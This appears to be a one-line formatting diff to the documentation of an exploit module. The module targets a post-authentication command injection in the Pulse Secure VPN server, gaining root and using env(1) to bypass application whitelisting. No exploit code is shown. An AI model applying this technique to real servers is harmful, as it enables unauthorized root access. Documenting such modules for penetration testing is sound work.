@@ -1,7 +1,7 @@ ## Introduction This module exploits a post-auth command injection in the Pulse Secure -VPN server to execute commands as root. The env(1) command is used to +VPN server to execute commands as root. The `env(1)` command is used to bypass application whitelisting and run arbitrary commands. Please see related module `auxiliary/gather/pulse_secure_file_disclosure`